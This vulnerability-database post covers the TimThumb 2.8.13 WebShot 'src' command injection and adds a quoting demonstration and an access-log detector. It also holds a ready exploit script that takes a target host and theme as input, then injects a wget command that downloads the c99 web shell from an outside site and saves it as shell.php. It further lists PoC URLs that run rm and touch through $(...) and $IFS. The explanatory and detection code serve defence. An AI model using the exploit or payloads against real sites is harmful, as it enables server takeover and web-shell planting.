TimThumb 2.8.13 RCE Remote Command Execution Vulnerability
- Published on
- Vulndb
timthumb.php <= 2.8.13 WebShot 'src' parameter remote command execution vulnerability. This is an older bug: the latest TimThumb release is 2.8.14, but many themes and plugins still bundle an older copy of the file, so vulnerable instances remain common. Recording it here. The WebShot feature (WEBSHOT_ENABLED, which is off by default, so only sites that switched it on are exploitable) builds a shell command around the `src` URL to run the screenshot tool, and the URL is not shell-escaped, so a `$(...)` command substitution embedded in `src` is executed on the server. The `src` host is the target site itself, which TimThumb accepts as a same-site request, and `$IFS` is the usual substitute for spaces inside the injected command.
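Added example (not from the original post, and not TimThumb's own code): a Python stand-in for the shell command TimThumb's WebShot code builds around the `src` URL. `printf` replaces the CutyCapt/xvfb-run invocation so the command only prints the URL back, but the quoting is the same as in the vulnerable pattern: the URL is dropped into a double-quoted shell string, so a `$(...)` inside it is expanded by /bin/sh. `build_cmd_safe` shows the fix, `shlex.quote` being Python's equivalent of PHP's `escapeshellarg`. The payload string is constructed for the example in the shape of the PoC URLs.

```python
"""Why a $(...) in TimThumb's src runs on the server, and the fix.

Added example. printf is a stand-in for the screenshot tool; only the
quoting of the attacker-controlled URL matters here. Requires /bin/sh.
"""
import shlex
import subprocess


def build_cmd_vulnerable(url: str) -> str:
    # Mirrors the unsafe pattern: the attacker-controlled URL is placed
    # in a double-quoted shell string, where $(...), `...` and ${IFS}
    # are still expanded by the shell.
    return 'printf \'%s\\n\' "' + url + '"'


def build_cmd_safe(url: str) -> str:
    # shlex.quote (like PHP's escapeshellarg) turns the URL into a
    # single-quoted literal, so the shell performs no expansion on it.
    return "printf '%s\\n' " + shlex.quote(url)


def run(cmd: str) -> str:
    # shell=True runs the string through /bin/sh, as PHP backticks would.
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


# Constructed payload: ${IFS} stands in for the space between the
# command and its argument, exactly as $IFS does in the PoC URLs.
PAYLOAD = 'http://site.com/$(echo${IFS}INJECTED)'

if __name__ == '__main__':
    print('vulnerable:', run(build_cmd_vulnerable(PAYLOAD)))  # http://site.com/INJECTED
    print('safe      :', run(build_cmd_safe(PAYLOAD)))        # payload printed literally
```

The vulnerable form prints `http://site.com/INJECTED`, proving the embedded `echo` ran; the escaped form prints the payload unchanged. Any user input that reaches a shell command must be passed through the escaping function, not just validated as "looks like a URL".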
TimThumb exp
# [+] TimThumb <= 2.8.13 Exploit
# ============================================================
# http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)
import sys
import urllib.parse
import urllib.request


def banner():
    print('''
-- UrduSecurity Exploits --
--TimThumb 2.8.13 Remote Code Execution --
-- Author: Muhammad Adeel --
-- blog: http://urduSecurity.blogspot.com\n\n''')


def usage():
    print('''
-- Usage: python UrduSecurity-Exploit.py --\n''')


def get_shell(host, theme):
    # This script targets the TimThumb copy bundled with Themify themes
    # (themify/img.php); adjust the path for other themes or plugins.
    # The src host is the target itself, so TimThumb treats the fetch as
    # same-site; the $(...) substitution is then run by the server's shell.
    cmd = 'wget http://www.c99php.com/shell/c99.txt; mv c99.txt shell.php'
    src = 'http://' + host + '/$(' + cmd + ')'
    url = ('http://' + host + '/wp-content/themes/' + theme +
           '/themify/img.php?webshot=1&src=' + urllib.parse.quote(src, safe=''))
    try:
        urllib.request.urlopen(url, timeout=30).read()
    except Exception as e:
        print('Not Success, Might be site Patched. (%s)' % e)
        return False
    print('\n[+] Shell Uploaded! Find Your Shell in Theme Directory.')
    return True


def main():
    banner()
    usage()
    host = input('Enter Target Host[anything.com]: ')
    theme = input('Theme Name[parallax or any which you find]: ')
    if not get_shell(host, theme):
        sys.exit(1)


if __name__ == '__main__':
    main()
TimThumb PoC
http://site.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/$(rm$IFS/tmp/a.txt)
http://site.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/$(touch$IFS/tmp/a.txt)
Each $(...) is expanded by the shell that runs the screenshot tool; $IFS replaces the space between the command and its argument, so the first URL deletes /tmp/a.txt and the second creates it. Verify by checking for /tmp/a.txt on the host.
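Added example (not from the original post): detection logic for these WebShot injection attempts in web server access logs, the check a defender would run over the requests the PoC URLs above produce. It assumes the Apache/nginx "combined" log format; the sample lines are constructed for the example and the hosts, paths and addresses are placeholders. The request URI is decoded twice to catch double-encoded payloads, the request must carry a webshot parameter, and the src value is flagged when it contains shell-substitution tokens.

```python
"""Flag TimThumb WebShot command-injection attempts in access logs.

Added example; sample log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx combined format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that mean the src value is meant for a shell, not an image fetch.
SHELL_TOKENS = ('$(', '`', '${IFS}', '$IFS', ';', '|')


def query_params(uri: str) -> dict:
    """Split the query string on '&' before decoding, then decode each
    value twice so %2524%2528 (double-encoded '$(') is still caught."""
    query = uri.split('?', 1)[1] if '?' in uri else ''
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(
            unquote_plus(unquote_plus(value)))
    return params


def is_webshot_injection(uri: str) -> bool:
    """True if uri is a webshot request whose src carries shell tokens."""
    params = query_params(uri)
    if 'webshot' not in params:
        return False
    src = ''.join(params.get('src', []))
    return any(tok in src for tok in SHELL_TOKENS)


def scan_log(text: str) -> list:
    """Return (client_ip, request_uri) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_webshot_injection(m.group('uri')):
            hits.append((m.group('ip'), m.group('uri')))
    return hits


# Constructed sample: a normal resize, a benign webshot, the PoC touch
# payload, and a double-encoded $(id) against a Themify img.php copy.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2014:12:00:01 +0000] "GET /wp-content/plugins/pluginX/timthumb.php?src=http://site.com/wp-content/uploads/a.jpg&w=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2014:12:00:02 +0000] "GET /wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2014:12:00:03 +0000] "GET /wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/%24(touch%24IFS/tmp/a.txt) HTTP/1.1" 400 512 "-" "python-urllib/2.7"
198.51.100.9 - - [10/Jul/2014:12:00:04 +0000] "GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http%3A%2F%2Fsite.com%2F%2524%2528id%2529 HTTP/1.1" 400 512 "-" "python-urllib/2.7"
"""

if __name__ == '__main__':
    for ip, uri in scan_log(SAMPLE_LOG):
        print(ip, uri)
```

Only the two requests from 198.51.100.9 are reported. Requiring the webshot parameter keeps ordinary resize traffic out of the results; `;` and `|` are included because the exploit script above chains commands with `;`, and a legitimate image URL rarely carries either character.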
Original link: TimThumb 2.8.13 RCE Remote Command Execution Vulnerability
Media may repost this content only if the attribution and the original link are retained; otherwise our content may not be used.